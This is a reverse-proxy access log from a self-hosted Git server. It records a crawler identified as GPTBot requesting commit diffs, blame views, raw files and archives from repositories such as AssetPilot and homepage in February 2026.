"/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" [Client 74.7.227.38] [Length 10262] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" -[17/Feb/2026:13:37:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/activity/quarterly" [Client 74.7.227.38] [Length 8615] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/activity" -[17/Feb/2026:13:37:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 17149] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" -[17/Feb/2026:13:37:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 17183] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" -[17/Feb/2026:13:37:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 17176] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" -[17/Feb/2026:13:37:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 12754] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument" -[17/Feb/2026:13:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 10832] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument" -[17/Feb/2026:13:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 15794] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument" -[17/Feb/2026:13:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 14303] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument" -[17/Feb/2026:13:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 13428] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument" -[17/Feb/2026:13:37:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 17176] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" -[17/Feb/2026:13:37:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 10903] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument" -[17/Feb/2026:13:37:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 10901] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument" -[17/Feb/2026:13:37:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 17356] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" -[17/Feb/2026:13:37:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 17373] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:37:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 17379] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:13:37:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 14869] [Gzip 9.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:13:37:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 259720] [Gzip 13.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:13:37:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 237700] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:13:37:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 18148] [Gzip 12.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:13:37:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 15450] [Gzip 8.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md" -[17/Feb/2026:13:37:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 2208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:13:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 22879] [Gzip 13.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:13:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 72002] [Gzip 10.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:13:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 5252] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:13:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 7694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:13:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 4068] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md" -[17/Feb/2026:13:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:13:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 17379] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?show-outdated=&style=unified&whitespace=ignore-all" -[17/Feb/2026:13:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:13:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 17667] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:13:38:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 66202] [Gzip 10.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:13:38:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 19909] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:13:38:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:13:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:13:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md" -[17/Feb/2026:13:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71830] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:13:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 70557] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:13:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:13:38:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:13:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js" [Client 74.7.227.38] [Length 25523] [Gzip 7.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" -[17/Feb/2026:13:38:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/" [Client 74.7.227.38] [Length 46] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/forks" -[17/Feb/2026:13:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver" [Client 74.7.227.38] [Length 14547] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/" -[17/Feb/2026:13:38:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 558451] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main" -[17/Feb/2026:13:38:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f" [Client 74.7.227.38] [Length 14464] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f" -[17/Feb/2026:13:38:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 10823] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data" -[17/Feb/2026:13:38:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 204108] [Gzip 13.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?show-outdated=&style=unified&whitespace=ignore-all" -[17/Feb/2026:13:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 204114] [Gzip 13.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?show-outdated=&style=split&whitespace=ignore-change" -[17/Feb/2026:13:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:38:16 +0000] - 200 200 - GET https 